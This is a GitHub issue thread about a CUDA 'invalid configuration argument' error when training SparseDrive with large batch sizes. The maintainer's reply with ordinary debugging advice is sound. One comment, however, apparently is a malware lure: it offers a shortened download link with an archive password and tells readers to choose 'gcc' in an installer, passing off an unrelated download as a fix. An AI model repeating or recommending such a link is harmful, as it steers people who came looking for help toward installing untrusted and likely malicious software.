### ISSUE TITLE
batch size problem

### ISSUE THREAD

**Issue by TmacTmac1992** [swc-17/SparseDrive#33]
Hi,

when i try larger batch size like 128 or 256, I got this issue, is there other parameters i should change as well? 

RuntimeError: CUDA error: invalid configuration argument                                                                                                                                                  
CUDA kernel errors might be asynchronously reported at some other API call, so the stacktrace below might be incorrect.                                                                                   
For debugging consider passing CUDA_LAUNCH_BLOCKING=1.                                                                                                                                                    
Compile with `TORCH_USE_CUDA_DSA` to enable device-side assertions.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by swc-17** [comment]
Try "export CUDA_LAUNCH_BLOCKING=1" for detailed information.
